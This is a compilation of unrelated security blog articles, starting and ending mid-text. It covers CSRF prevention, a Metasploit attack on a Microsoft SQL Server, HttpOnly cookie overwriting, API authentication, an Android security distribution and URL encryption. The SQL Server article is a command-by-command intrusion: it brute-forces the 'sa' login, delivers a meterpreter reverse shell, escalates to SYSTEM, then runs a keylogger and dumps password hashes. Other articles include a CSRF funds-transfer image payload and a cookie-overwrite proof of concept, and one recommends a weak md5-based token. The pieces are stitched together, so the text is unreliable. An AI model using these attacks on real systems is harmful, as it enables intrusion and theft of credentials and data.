attacker has created a fake page that submits this form on load, and has posted the link to that page on a forum. You found the link interesting and clicked. Once you clicked on the link, that page submitted the form. The form action deleted your account, because you had an active session. In this way, your account has been deleted by the attacker without your knowledge, but the request was made from your browser. I am sure this simple example has made it clear how the vulnerability affects a website’s users. Similarly, we could show how it can affect your bank accounts if the vulnerability exists in your banking applications. If the action is performed by a GET request, the attacker can also craft the request in an image tag. The SRC attribute of the image will be the action link of the form. When the image loads on the page, it will perform the action. <img src="http://targetwebsite.com/app/transferFunds?amount=25000&targetAccount=attackersAcctnumber" width="0" height="0" /> Misconceptions about patching CSRF Cross Site Request Forgery is one of the most dangerous web application vulnerabilities, so it must be checked and patched carefully. But there are a few misconceptions about the patching. Generally, developers use a few ways to patch the vulnerability, but those ways are not enough to prevent it. These are a few wrong ways of patching CSRF: Use of POST requests for critical tasks. Developers think that while it is easy to craft a fake GET request, crafting a fake POST request is not. If you are into web development and security, you know that one can easily create a page with a form that submits itself via JavaScript on page load. This will never prevent CSRF, so if you are going to apply this logic, you should think twice: any hidden form can be triggered via JavaScript. Another bad example of CSRF patching is URL rewriting. Developers create a URL rewriting scheme with unique session IDs in the URL. This makes the URL unpredictable, but it also exposes the user’s credentials in the URL. It may prevent CSRF, but it is equally harmful to users. Sometimes websites use a multi-step transaction process. Applied to the previous account-delete example, suppose the website asks for confirmation after requesting account deletion. If both requests have no protection against CSRF, the attacker can predict and perform all the steps, or find ways to reduce the number of steps in the transaction. There are a few other weak prevention methods which are not important enough to discuss here. Proven ways to prevent the CSRF vulnerability Checking the Referer header Checking the Referer header can help in preventing CSRF. If the request is coming from some other domain, it must be a fake request, so block it; only allow requests coming from the same domain. This method fails if the website has open redirection vulnerabilities, as attackers can perform GET-based CSRF through an open redirect. Also, most applications these days use an HTTPS connection, in which case the referrer may be omitted, so this method will not help if the website uses HTTPS. So, we will have to search for another way. Captcha verification in forms This is another nice way to prevent CSRF attacks on forms. The captcha verification process was initially developed to prevent bot spam in forms, but it can also be helpful in preventing CSRF. As the captcha challenge is generated randomly on the server for each form, an attacker cannot guess it, so he will never be able to send the correct captcha with a fake request, and all fake requests will be blocked by the captcha verification function. This method is not user friendly, though: most users don’t want to fill out a captcha on a website, so we should try to find ways that prevent the CSRF vulnerability without adding any extra burden on users. Unpredictable Synchronizer Token Pattern This is the most secure method for preventing CSRF. Unlike captcha verification, this method has nothing to do with users, so users will never know that something has been added to protect them. In this method, the website generates a random token in each form as a hidden value. This token is associated with the user’s current session. Once the form is submitted, the website verifies whether the random token came with the request, and if so, whether it is correct. By using this method, developers can easily identify whether the request was made by the user or by an attacker. <form action="accountdelete.php" method="post"><input type="hidden" name="CSRFToken" value="OWY4NmQdwODE4hODRjN2DQ2NTJlhMmZlYWEwYzU1KYWQwMTVhM2JmLNGYxYjJiMGI4jTZDE1ZDZjMTViMGYwMGEwOA==" /> ...</form> The strength of this method depends on how the token is generated, so always generate the token in a manner that is unpredictable. If you are thinking of implementing this on your own, try to randomize it. You can use: $randomtoken = md5(uniqid(rand(), true)); or try this: $randomtoken = base64_encode(openssl_random_pseudo_bytes(32)); Using base64_encode ensures that the generated value will not break your HTML layout with special characters. Generate this $randomtoken once the session is initiated after login, and add it to your session variables: $_SESSION['csrfToken'] = $randomtoken; Then add it to every form served to users: <input type='hidden' name='csrfToken' value='<?php echo($_SESSION['csrfToken']) ?>' /> The csrfToken is unique to each session. In every new session, it will be generated again and then verified against form requests. You can either use a single CSRF token for all forms in a single session, or use a different one for each form, which may be more secure. However, generating a different csrfToken for each form can cause trouble when users open multiple forms in multiple tabs and submit them one by one. There are also a few open source PHP classes and libraries available. You can use these to implement strong protection against CSRF vulnerabilities. A few open source libraries are: 1. Clfsrpm Clfsrpm is a popular PHP class that gives a strong way of preventing CSRF. It exposes a few public functions that you can use to generate and validate CSRF tokens. The complex part has already been done by the developer. You can read more and download the class from the link: CSRF Protection Class 2. NoCSRF NoCSRF is another simple anti-CSRF token generation and checking class written in PHP5. It also comes with easy-to-understand examples showing how to properly implement it in your web application. You can download NoCSRF from here: https://github.com/BKcore/NoCSRF 3. csrf by Skookum This is another PHP implementation of CSRF protection. The code is available for free, so you can copy it and use it in your application. Get the code from here: https://github.com/Skookum/csrf/blob/master/classes/csrf.php 4. anticsurf anticsurf is another small PHP library that can be used for preventing CSRF in PHP web applications. This library claims to provide strong entropy against brute-force attacks. It also implements one-time-use tokens and provides a timeout restriction. Read more about this PHP library and download it from here: https://code.google.com/p/anticsurf/ 5. CSRF-Magic CSRF-Magic is another strong implementation that can prevent CSRF attacks on a website. The library is available for free with an online demonstration. You only need to include one file at the top of your PHP files, and the library will do the rest of the work. It rewrites the scripts and forms on your website and then intercepts POST requests to check the injected token; this means it automatically adds protection to your traditional, insecure forms. You don’t need to add extra code for this; only include the library file at the top. It is one of the easiest CSRF protection libraries available for PHP applications. Download the library and see the demo here: csrf-magic: Wizard CSRF Protection for PHP 6. CSRF Protection CSRF Protection is also a nice and simple class. Although it doesn’t come with tutorials, it has fully commented code explaining how to use the library. It gives you a few functions to generate and then validate CSRF tokens. On the download page, a few samples show how to use this class to generate and then validate CSRF tokens in your own web application. Download the CSRF Protection library from GitHub via this link: https://github.com/XCMer/csrfprotect You can use any of the above classes or libraries according to your choice. But do not forget to share your experience with us via comments. User-side Prevention CSRF is a harmful vulnerability, so users should also follow a few steps to ensure their security. These are the important points: Always log out of important web accounts when not in use. Never use important web accounts (such as online banking) while casually surfing the web. Use the NoScript browser add-on to protect yourself from malicious scripts. Conclusion In this post, we have seen that Cross Site Request Forgery is a harmful vulnerability that affects users’ accounts. We have also seen various ways to prevent this attack and protect users’ accounts. If the website has a Cross Site Scripting vulnerability, performing CSRF becomes easier, and attackers can create an automatic worm to defeat CSRF defenses. In this post, we have discussed various open source libraries and classes. These classes can be used directly within PHP-based web applications to prevent the CSRF vulnerability. Web developers should take care of their website’s security and follow the given tips. There are various tools and manual methods available to test for CSRF. The most popular tool is the OWASP CSRFTester. You can download it from here: https://www.owasp.org/index.php/Category:OWASP_CSRFTester_Project If you want to test manually, you can review the code and inspect the forms. If a random token is not present, you should add one with the available open source classes. A short language-agnostic sketch of the synchronizer token pattern follows at the end of this post. I am sure you now know enough about CSRF and its patching. If you have anything to say about this, you can share it with us via comments. Source
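For readers who don't work in PHP, here is a minimal sketch of the same synchronizer token pattern in Python, using only the standard library. The session dict is a placeholder for whatever server-side session store your framework provides.

#!/usr/bin/env python3
# Synchronizer token pattern: one unpredictable token per session, echoed
# back as a hidden form field and compared in constant time on submission.
import secrets
import hmac

session = {}  # placeholder for a real per-user session object

def issue_csrf_token() -> str:
    # Generate the token once per session and reuse it for every form.
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]

def verify_csrf_token(submitted: str) -> bool:
    # compare_digest avoids timing side channels during the comparison.
    expected = session.get("csrf_token", "")
    return bool(expected) and hmac.compare_digest(expected, submitted)

# Embed issue_csrf_token() as a hidden input when rendering the form,
# then on every state-changing POST:
token = issue_csrf_token()
assert verify_csrf_token(token)          # a genuine submission passes
assert not verify_csrf_token("forged")   # a forged value is rejected

Here, secrets.token_urlsafe plays the same role as the openssl_random_pseudo_bytes() call suggested above: an unpredictable value that also stays HTML-safe.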
-
All systems and database administrators will agree that password complexity does not go very far when it comes to SQL servers. Whether this is done to keep troubleshooting simple for support staff or it is simply a matter of underestimating the risks, it doesn’t really matter. What matters is that this makes it very easy for an attacker to get full access to the system. In this attack, we will use a standard install of Linux Kali and the preinstalled Metasploit framework. The target is a Windows XP machine, running a Microsoft SQL Server 2005 instance. The same attack will work on any MS SQL platform and Windows OS, because the weakness in the system here is the password strength, not the environment itself. Reconnaissance As in any attack, we will first need to gather intelligence on our target system. One option is to use tools like NMAP to scan a certain IP range for standard SQL ports. Command: Nmap –sT –A –PO 192.168.23.0/24 Metasploit also has the mssql_ping scanner built in. This scanner will identify any Microsoft SQL server in a specific IP range. Commands: use auxiliary/scanner/mssql/mssql_ping set RHOSTS 192.168.23.0/24 (our target IP range) set THREADS 8 run Now that we have our target system (192.168.23.100) and some more details on the version of Microsoft SQL server (2005 SP4, TCP port 1433), we can move on to the next step. Attack This attack is based on a simple principle. In most cases Microsoft SQL server will be installed in a mixed mode instance. The default user for this is “sa.” Very often a simple password is used for this user. This means it will be relatively easy to brute-force the password, using a dictionary file. These dictionary files can be downloaded or generated. The benefit of generating a customized list is that some tools allow for the manual addition of specific terms such as the software name or vendor that could have been used by the application installer. That would cover, for instance, a password like “Sandstone01? for the SQL instance running the databases for the application “Sandstone”. For the attack we will use the built-in tool MSSQL_Login. After specifying the target and a password file, the dictionary attack will begin. Commands: use auxiliary/scanner/mssql/mssql_login Set PASS_FILE /root/passwords.txt (the dictionary file) Set RHOSTS 192.168.23.100 Set Threads 8 Set verbose false run If this step of the attack is successful, the SA password will be found. This by itself can be a valuable piece of information that can allow for the manipulation of the databases. In this attack, however, we will use the SA account to gain access to the underlying Windows operating system. Exploitation We can now use this SA password obtained to set up a connection to our target. Kali Linux has a tool built-in named mssql_payload. This tool will allow us to send a payload through port 1433 with our new login credentials. We will use this payload to set up a session between the target and our attacking system. Commands: use exploit/windows/mssql/mssql_payload set RHOST 192.168.23.100 (our target) set password Password01 (which we have just cracked) use payload/windows/meterpreter/reverse_tcp (our selected payload) exploit Now the fun starts. A session has been opened to our target and from here we have many commands at our disposal. Keep in mind, however, that many antivirus programs will detect, block, and remove the Meterpreter files when they are installed on a target system. 
As for the antivirus caveat: from experience, I can say that many SQL server administrators disable any form of on-access scanning to get the most performance out of the databases hosted by the server. If the target only runs, for instance, an overnight virus scan, that leaves plenty of time to attack the system, gather its data, and leave undetected.

Instead of the Meterpreter payload, other payloads can be used as well. This is just a matter of running the same commands as above but changing the name of the payload. The payload "generic/shell_bind_tcp," for instance, will gain command prompt access to the target system.

Privilege Escalation

For many of these commands, we will need to increase our user access level. Tools that create screenshots and keyloggers, and tools that extract password hashes, need to run with administrative privileges. This is made quite easy with the Meterpreter shell. First, we generate a list of running processes with the "ps" command. We can then use the "migrate" command to migrate to a process with a higher level of system access. In this case, that will be the explorer.exe process. There is one extra command we need to use first: getsystem. This gives the Meterpreter session SYSTEM access, which is required by the migrate command. Without it, "insufficient privileges" will be returned when running the migrate command.

Commands:

ps (this will show the running processes and their corresponding PIDs)
getsystem (to obtain SYSTEM privileges)
migrate 1064 (the explorer.exe PID in this example)

Data Collection

Now that we have full system access, we can use some other tools to gather the data we need.

Command:

screenshot

This will create a screenshot of the target and save it as a JPEG file on the local system.

Command:

run post/windows/capture/keylog_recorder

This will run a keylogger on the target and save the recorded text to a file on the local system. This can be used to obtain web login details, bank accounts and credit card information, etc. Many antivirus programs, however, can easily pick up this keylogger.

Commands:

migrate 772 (the PID for services.exe)
run post/windows/gather/hashdump

User passwords in a system are usually stored in the form of one-way hash values. These can be cracked by sheer brute force or by more sophisticated, related attacks, such as dictionary or rainbow table cracking methods. See my article on that topic: "Password Auditing an Active Directory Database." To obtain the hash values from the target system, we need to migrate to the services.exe process to get the right level of system access. These values can then be used in the many password brute-force tools available, such as Ophcrack and Hashcat.

The Result

In this process of a few relatively easy steps, we have bypassed any possible firewall by using an open SQL Server port, and we have not only gained full database access but used that access to gain full operating system access. The keylogger and extracted password hashes might even gather more useful network details, such as usernames and passwords, to gain further access to other systems.

How to Defend Against This Attack

There are a few options to protect a system from this attack. First of all: use a proper password! No matter what the reason is, a production SQL server should never have a simple SA password that can be brute-forced without much effort.
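To make this recommendation concrete, here is a minimal sketch of generating an SA password that a dictionary attack like the one above has no realistic chance against. The choice of Python and the 24-character length are illustrative assumptions, not a requirement.

import secrets
import string

# Build a 24-character random password from a mixed alphabet; at over
# 6 bits of entropy per character (~150 bits total), no wordlist will
# ever contain it and online brute-forcing is hopeless.
alphabet = string.ascii_letters + string.digits + "!@#$%^&*()-_=+"
sa_password = "".join(secrets.choice(alphabet) for _ in range(24))
print(sa_password)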
Beyond password strength, an intrusion detection system, or simply monitoring the logs automatically or manually, could detect a brute-force attack through the high number of failed login attempts. Another method of defense would be to run active antivirus scanning on the system 24/7. In this example, the payload would have been picked up and deleted or quarantined before the attack could compromise any data.

Source
-
1. Introduction

When a cookie has the HttpOnly flag set, JavaScript cannot read it in case of XSS exploitation. This is actually the reason why the HttpOnly flag was introduced. As can be seen, the HttpOnly flag puts a restriction on cookie reading by JavaScript. Does it mean that the attacker is stopped at this point? Reading is prevented, but what about writing? The HttpOnly flag was not introduced to prevent writing, so this might be potentially interesting. It turns out that a cookie with the HttpOnly flag can be overwritten by JavaScript in some browsers, and this overwriting possibility can be used by the attacker to launch a session fixation attack, which is the subject of this article.

2. Overwriting a cookie with HttpOnly flag by JavaScript

When JavaScript can overwrite a cookie with the HttpOnly flag, the attacker can launch a session fixation attack via an HttpOnly cookie in case of XSS exploitation (you can read about session fixation attacks in one of my previous articles [1]). As a consequence of a session fixation attack, the attacker can impersonate the victim, as he knows the victim's session ID. The assumption here is that the session is not regenerated in the application after successful login. One can say at this point that the flaw is in the application itself, because the application does not regenerate the session after successful login. This is true, but there is no reason to allow JavaScript to overwrite an HttpOnly cookie in some browsers, and this overwriting possibility can be used to take advantage of the lack of session regeneration after successful login in order to finally launch a session fixation attack.

What about the case when the session ID is regenerated after successful login? Can this be used somehow by the attacker? Yes: the attacker can switch a user to his own account by setting the user's session to the one the attacker is currently using. The user then thinks that he is using his own account, and actually enters sensitive information into the attacker's account.

3. Browsers which allow JavaScript to overwrite HttpOnly cookie

I found that the following browsers allow JavaScript to overwrite HttpOnly cookies:

Safari
Opera Mobile
Opera Mini
BlackBerry browser
Konqueror browser

The problem was reported to the vendors (4 February 2014). Internet Explorer, Firefox and Opera (standard install) are not vulnerable to the aforementioned attack.

4. Response from vendors

Opera Software confirmed the problem in Opera Mobile and Opera Mini. They decided to fix the issue in Opera Mini (the date of the fix has not been determined). Although Opera Mobile was available on Google Play at the time of submission, Opera Software considered it legacy and decided not to fix it (they responded that the replacement is Opera for Android, which prevents JavaScript from overwriting HttpOnly cookies). BlackBerry responded that the PlayBook tablet OS (the one I used while testing) had been announced as out of support as of April 2014 and the issue will not be fixed. However, the issue was reported before the OS end of support was announced, and they decided to put me on the Acknowledgements 2014 list of the BlackBerry Security Incident Response Team (due to their policy, my name will be added there by the end of April 2014) [2]. The issue was confirmed in Konqueror, but it will probably not be fixed. The conversation about this bug is available in the KDE Bugtracking System [3]. The issue was reported to Apple two months ago, and since then I haven't received any feedback from them.
5. Playing with the issue

Here is a simple piece of code:

<?
// cookie1 is set with the HttpOnly flag (last argument 1), cookie2 without it
setcookie('cookie1', ++$_COOKIE['cookie1'], time()+2592000, '/', '', 0, 1);
setcookie('cookie2', ++$_COOKIE['cookie2'], time()+2592000, '/', '', 0, 0);
?>
<HTML>
<?
print "Cookie1: ".$_COOKIE['cookie1']."<br>";
print "Cookie2: ".$_COOKIE['cookie2'];
?>
<script>alert(document.cookie);</script>
<script>document.cookie='cookie1=100; expires=Thu, 2 Aug 2014 20:00:00 UTC; path=/';</script>
</HTML>

The procedure is as follows: run the page and then see that cookie1 (which has the HttpOnly flag set) has been overwritten by JavaScript.

6. Summary

The HttpOnly flag was introduced to prevent JavaScript from reading a cookie marked with it. It turns out, however, that a cookie with the HttpOnly flag can be overwritten by JavaScript in some browsers, which can be used by the attacker to launch a session fixation attack. The article presented which browsers allow JavaScript to overwrite HttpOnly cookies, together with the responses from the vendors. Finally, a simple piece of code was provided to play with the issue.

References:

[1] Understanding Session Fixation, Understanding Session Fixation - InfoSec Institute
[2] Acknowledgements 2014 – BlackBerry Security Incident Response Team, BlackBerry Enterprise – BlackBerry Products & Services - Canada
[3] KDE Bugtracking System – Bypassing HttpOnly cookie in Konqueror, https://bugs.kde.org/show_bug.cgi?id=330751

Source
-
Introduction

In the last couple of years there has been a boom in cloud computing, but mainly just the term is new: we've been using cloud services for years without even realizing it. Almost every cloud, whether it's SaaS, PaaS or IaaS, implements some kind of API (Application Programming Interface), which developers can use to interact with the service programmatically. APIs can be used for a number of things, like pulling data out of the database, sending data to be stored in the database, pushing jobs to a queue, etc. OpenStack is a cloud computing system that uses a dashboard to manage every component of the system, which in turn uses APIs to do its work. Let's take a look at the picture below, taken from [1], which presents a basic overview of the components used in OpenStack, connected via APIs.

Cloud APIs are basically programming interfaces embedded into the cloud system, which a programmer uses to instruct the cloud to perform some action. When a cloud service provides an API, we have all the advantages of an API available, so we can automate many tasks we would normally have to do by hand. Imagine that we have to apply some action to all our virtual machines running in the cloud: if there are just a few virtual machines, it wouldn't be a problem to just click the button that performs the action we would like to execute. But what if there are thousands of virtual machines, or if there isn't a single button to perform the needed action, and we have to press multiple buttons and switch between panes to do it? In such situations it would be very painful to do this by hand, so the API comes to the rescue, enabling us to automate most of the work.

Methodologies

Before going any further with this article, we need to explain that when planning an API, we have to think about the overall picture. Whenever we send a message over a communication channel, we're using some kind of protocol: a set of rules that must be known both to the sender and the recipient to be able to process the message correctly. Whenever we're concerned about securing the API, we need to send and receive messages over a secure network connection: we might use a secure HTTPS connection rather than an insecure HTTP one. And it's not limited to HTTP and HTTPS; we might be sending data over other protocols as well: POP(S), IMAP(S), SMTP(S), LDAP(S), XMPP(S), etc. Remember to use the secure version of the protocol (with the letter 'S' in its name) when we want to encrypt the data we're sending out on the Internet: only the sender and recipient should be able to read the message in cleartext.

The other thing is data representation or format: it doesn't really matter how the message is structured or formatted as long as both endpoints understand it. Usually, APIs exchange messages in XML or JSON format, or possibly both are supported, which gives users more flexibility when interacting with the application. Whichever format we're using to exchange data between the two endpoints, we must properly secure it against possible attack vectors. When dealing with an API where the communication is done over HTTP(S), we need to check and test the application for known web application injection flaws, like CSRF, XSS, SQL injection, schema validation, etc.
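To tie the two points together, here is a minimal sketch of a client talking to a cloud API over a secure transport with a defined data format. The endpoint, token and field names are hypothetical; the point is simply HTTPS plus JSON, assuming the common Python requests library.

import requests  # assumption: the requests HTTP library is installed

# Hypothetical endpoint and bearer token, for illustration only.
resp = requests.get(
    "https://api.example.com/v1/servers",          # HTTPS, never plain HTTP
    headers={"Accept": "application/json",         # agreed-upon data format
             "Authorization": "Bearer <token>"},
    timeout=10,
)
resp.raise_for_status()
for server in resp.json():                         # parsed JSON reply
    print(server["id"], server["status"])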
The most common types of APIs are the following:

REST (Representational State Transfer): REST is an architecture, not a protocol, built upon the HTTP protocol, where URI requests are used to reference resources by using the GET, POST, PUT and DELETE HTTP methods. An important concept to grasp is the following: requests need to be authorized based on resource content and not URLs, because when we change the application, the URLs will change as well, and all of a sudden our security policy is no longer valid. URLs play a minor part in the application, and we shouldn't build security on them. Every security feature we would like to have in REST has to be developed manually, since none of it is built in. A REST API is usually simpler to learn, which is why many developers use it to build their own API to extend their application.

SOAP (Simple Object Access Protocol): a protocol defining the exchange of structured data over the network [4]. Usually it uses HTTP(S) for message transmission and XML for data representation or message format. If HTTP(S) is used, it uses GET for reading and POST for writing data. There's also WS-Security, an extension to SOAP that provides guidelines for solving the following security problems [5]: identification and authentication of a client, ensuring the integrity of the message, and preventing eavesdropping on messages in transit.

XML-RPC: uses an XML-based messaging format and the HTTP communication protocol.

JSON-RPC: uses a JSON-based messaging format and the HTTP communication protocol.

Identification Techniques

When developing a brand new application programming interface, we need to address the following issues:

Identity: when starting to interact with a server that doesn't initially know who we are, we must prove our identity; we need to provide the answer to the question, "Who are you?" Usually, we must provide a user ID or a public key, which uniquely identifies us. Note that the provided information is public, so anybody can identify as us, but they won't be able to prove it.

Authentication: here we have to prove that we are who we say we are by answering the question, "Can you prove you are who you say you are?" The server will send us a challenge, to which we must respond with something that's known only to us, be it a password, a private key, a token, etc.

Authorization: once we've proven our identity, we can request access from the application we're interacting with. At that time, the application needs to check whether we're allowed to access the requested resource.

Below we can see a number of techniques an application can use to identify and authenticate users.

Username/Password: we send a username and password to the endpoint application to identify and authenticate ourselves. An example is basic authentication, where we connect to the server, which responds with a WWW-Authenticate HTTP header containing the scheme the server wants us to authenticate against. Whenever a server sends us a WWW-Authenticate HTTP header, it wants us to authenticate, and we have to respond with the Authorization HTTP header containing the base64-encoded username:password pair. Since a base64-encoded string can easily be decoded back to its plain text, the communication must be encrypted if basic authentication is used.

Sessions: at first we send a username and password to the application to get back a cookie, which is then sent in all subsequent requests to establish an authenticated session.
Certificates: an application might use a public/private key PKI infrastructure to authenticate users, which requires valid server and client certificates signed by a valid certificate authority that can vouch for the certificates' validity.

OAuth: has gained a lot of popularity over the years and is mainly used when an application uses another application on behalf of the user. If we're writing an application that implements a share button for Facebook or Twitter, we're most probably using OAuth authentication, which grants the application access to the Facebook/Twitter data without revealing the user's password to the application itself. Therefore, the application doesn't need username/password authentication, only OAuth.

Custom Authentication Scheme: we can use a custom authentication scheme to identify, authenticate and authorize users however we prefer, customized all the way down to the core. We should only do so if we really know what we're doing.

API Key: when API keys are in use, identity and authenticity can be proven directly in the first request sent to the server, without prior authentication with a username/password or a private key. This has the minor advantage of saving some bandwidth, which isn't really crucial, since Internet connections are really fast nowadays. An API key is simply a very long, unique token that's known only to the application running on the server side and to the client sending an API request.

The items below present why API keys are superior to some of the other authentication schemes outlined previously.

Entropy: when auto-generating the API key, which is a long ID, the entropy is significantly larger compared to a username/password, which usually has between 5 and 15 characters. The API key has a much larger entropy space because the string is longer and its characters are randomly selected. This significant increase in randomness makes the key harder to brute-force and therefore more secure.

Password Change: when we change a password through the web interface, because we've forgotten it or we simply want to comply with a security policy that rotates it every so often, the clients that use the API need to be reconfigured to support the password change. If an API key is used, the password can be changed independently of the API key, which remains the same.

Speed: usernames and passwords are usually stored in the form of MD5/SHA1 hashes in the backend database. When the user authenticates to the application, a hash is calculated and compared to the value stored in the database. If the hashes match, access is granted; otherwise it's not. MD5/SHA1 hashes have known collision attacks, which lowers their security, but there are other methods to attack a hash: rainbow tables, powerful specialized hardware components, advanced software algorithms, cloud cracking farms, etc. Such attacks are not really relevant where API keys are involved, because API keys are just strings that are compared on each request. Since API keys are normally quite long, they can't be brute-forced in real time, which largely eliminates that attack vector. Keep in mind, though, that an API key is ultimately just a string known to the server application as well as the client, so a short or poorly generated key could still be brute-forced easily. Note that usernames and passwords can be just as difficult to crack if properly slow algorithms like Blowfish, Bcrypt or SHA512 are used. Why slower algorithms; shouldn't we strive towards faster algorithms and web applications?
In this case, no. Using a slower algorithm to compute a hash means that an attacker brute-forcing the hash is also slowed down considerably, which is a good thing, as it prevents hackers from cracking our hashes in real time.

Exposure: when we generate an API key, we immediately download it from the web page and save it into a file on our filesystem; this isn't so with passwords, which are not handled with so little fuss.

Traceability: with API keys, we always know which request was issued by which client, because each client uses its own unique API key. This isn't so with usernames and passwords, which are often shared among many users and sent in emails in cleartext; because of that, they can also be stolen by attackers easily.

After the development of the API, we have to test it properly. Since an API is most often built on HTTP(S), the standard web application threats are also lurking in the background. Each of the techniques outlined in this article also has its share of vulnerabilities that we must be careful not to overlook. The OWASP organization provides many documents that outline the vulnerabilities in a chosen architecture, such as [6], but there are so many possible vulnerabilities in an API that it's better if a professional penetration tester or security consultant checks the application and its code for vulnerabilities. We should also run a penetration test on a regular basis to minimize the number of bugs still residing in our code. In the end, it all depends on how the code is written, but the standard principle of never trusting user data still applies. To build a safer API, we might even apply an SDLC (Secure Development Life Cycle) to the development process.

Conclusion

When choosing a cloud service provider, we'll most likely be using its API sooner or later to automate actions. When choosing the CSP, one of the things to check for is proper documentation and the security of its API. If the CSP has good documentation for its API, that's the first sign that something is being done right; otherwise, it might be the opposite. In addition to that, CSPs should allow each customer to hire a penetration tester to test the API, or they should hire a security consultant or penetration tester themselves. When developing our own API, we must take the same security precautions and make sure the API is thoroughly tested for security bugs.

References:

[1] OpenStack: The Open Source Cloud Operating System, https://www.openstack.org/software/.
[2] Do you need API keys? API Identity vs. Authorization, https://blog.apigee.com/detail/do_you_need_api_keys_api_identity_vs._authorization/.
[3] It's Me, and Here's My Proof: Why Identity and Authentication Must Remain Distinct, http://technet.microsoft.com/en-us/library/cc512578.aspx.
[4] SOAP, https://en.wikipedia.org/wiki/SOAP.
[5] Jason Austin, Securing Your API.
[6] REST Security Cheat Sheet, https://www.owasp.org/index.php/REST_Security_Cheat_Sheet.

Source
-
Are you a Backtrack/Kali freak? Ever thought of having a similar distribution in your arsenal dedicated to Android security? "Android Tamer" is the solution to fulfill your needs.

What is Android Tamer?

Android Tamer is a Linux-based distribution developed for Android security professionals. This distribution is based on Ubuntu 10.04 LTS and includes various popular tools available for Android development, penetration testing, malware analysis, ROM analysis and modification, Android forensics, etc. This article walks you through the various tools available in "Android Tamer" and how they fulfill real-life Android security needs.

Prerequisites

A machine with VirtualBox installed
RAM: 512 MB (minimum)

Bringing it UP

We can download the latest version of Android Tamer from its official website (Android Tamer). Currently there are two versions available. After downloading, extract the zip file, which gives a VMDK file that can be opened with virtualization software like VMware Workstation or VirtualBox. It is suggested to use this VMDK file in VirtualBox rather than VMware, since it is optimized for VirtualBox. To learn more about VMDK files, please visit here (VMDK - Wikipedia, the free encyclopedia).

Now open up VirtualBox, create a new virtual machine instance, and boot the VMDK file to start running "Android Tamer". It greets us with a brand new window that needs a username and password to log in. The default username:password is tamer:android.

Description of Available Tools

"Android Tamer" has several popular tools preinstalled, with the following as its main sections:

ROM Modding
Reverse Engineering
Pen Testing
Malware Analysis
Forensics
Development
Vulnerable Lab Tools
Rooting

Let's now explore each section and see the existing tool set and how it can be useful.

Reverse Engineering

This section contains the most popular Android reverse engineering tools, including dex2jar, JD-GUI, APKTOOL, etc. APK Analyser is another important tool available in the Reverse Engineering section. APK Analyser is a powerful framework which allows us to disassemble byte code, analyze application architecture, perform byte code injection in Android apps, and the list goes on. This is one of the best tools available to analyze Android apps, and it comes preinstalled with Android Tamer.

Malware Analysis

This is one of the finest sections, which includes some great automated tools for Android malware analysis. DroidBox is one of them. We can simply use DroidBox from the command line by navigating to the directory /Arsenal/Droidbox. In general, you may find it difficult to set up DroidBox on your local machine, as it has several dependencies that must be installed to run the tool. Android Tamer sets everything up for you. AndroGuard is another great set of Python tools preinstalled for malware analysis. This is one of the best tools I have seen on the Internet for Android malware analysis. After its release, a lot of other tools were built based on AndroGuard. You can go ahead and see the documentation available at its official link (https://code.google.com/p/androguard/).

Pen Testing

Pen Testing is the right place for you if you are looking for a strong set of tools to audit the security of your Android apps or smartphone. It contains tools required to audit both browser-based apps and native apps. Tools for testing browser-based apps include Burp Suite, w3af, Firefox with all the required plugins, OWASP ZAP, etc.
It comes preinstalled with the Mercury Framework, which is one of the best tools available for auditing Android apps. It basically looks for vulnerabilities in the IPC endpoints of an application. Android Tamer also contains the Smartphone Pentest Framework by Bulb Security, which offers Metasploit-like functionality for auditing the security of your smartphone.

Development

The Development section is one of my favorite sections, as it allows you to write your POC apps during a pen test. Let's assume you have identified a content provider leakage vulnerability in an application and want to write a malicious app as a proof of concept to exploit the identified vulnerability. The tools available in the Development section come in handy here. It is not recommended to use this section for full-time development, as it eats a lot of memory and slows the system down.

Eclipse + ADT: Android Tamer contains the Eclipse IDE integrated with the ADT bundle, which enables us to write Android apps.

DDMS: the Dalvik Debug Monitor Service is an excellent solution for tasks such as interacting with the file system, controlling the emulator, pulling and pushing files from/to the device or emulator, debugging applications, etc.

Android NDK: the Android Native Development Kit enables us to write low-level applications in C/C++.

Forensics

Android Tamer contains several preinstalled digital forensics tools.

AFLogical Open Source Edition: AFLogical is a popular logical data extraction tool made for the Android platform. It pulls all available MMS, SMS, contacts, and call logs from an Android device and presents the data to the examiner.

Sleuthkit is another command-line tool integrated to perform in-depth analysis of file systems. This tool also has a graphical user interface version named Autopsy.

Rooting and ROM Modding

If, during your pen test or forensics/device assessment, you come across a device which is not rooted and you need to root it in order to gain more insight, the default installation comes packaged with Android-version-specific rooting exploits such as GingerBreak, zergRush, psneuter, etc. At times it might be required to check or modify existing ROMs, or to analyze the content of an existing ROM backup. For such scenarios, the DSIXDA Kitchen is provided, which adds ROM modding capabilities to the system. In order to flash these customized packages back onto the device, we need flashing utilities like fastboot, Flashtool, Heimdall, etc. The distribution also includes common tools like QtADB, which acts as a file-manager-style utility for devices over the ADB interface.

Final Words

If you are looking for a framework for all your Android security needs, Android Tamer could be one of the best tools to look into.

Source
-
I don't see the point of this post; it just lends importance to a nobody. @Kronzy, seriously, you shouldn't have posted and played along; he's probably rubbing his hands with glee right now because he's become a topic of discussion...
-
This paper pinpoints the poor practice of cryptography in URLs, typically implemented to encrypt sensitive data residing in a website URL in the form of a query string that is transmitted across a variety of networks. Websites can be compromised and such sensitive information (the query string) can be disclosed by exploiting this vulnerability. This article demonstrates a real-world scenario in which developers inadvertently make mistakes by practicing weak cryptographic methods. Finally, this article addresses the various disadvantages of applying weak cryptographic algorithms and suggests a variety of alternative methods to secure URL data properly.

Introduction

Securing a URL is the process of concealing or encrypting a parameterized, query-string-based URL such as www.xyz.com/login.aspx?uid=ajay&pawd=09876 by applying C#.NET cryptography. The moment a URL is requested from the server, we internally determine the required parameters, encrypt the query string values where sensitive information is typically located, redirect them to another page for further processing, and then decrypt the encrypted query string values there, if necessary. Throughout this process, the URL always shows bizarre values in the query string that are safe from a malicious hacker's eyes, because it is very hard for him to figure out what exactly is travelling across the network via the query string. The idea of query string encryption protects a web page from MITM or session hijacking attacks to some extent. This mechanism is somewhat similar to URL rewriting, where a verbose URL is shown in the address bar instead of the actual web page address where the query string parameters are located. The hacker can never anticipate what query string values the requested URL would have contained.

Susceptible URL

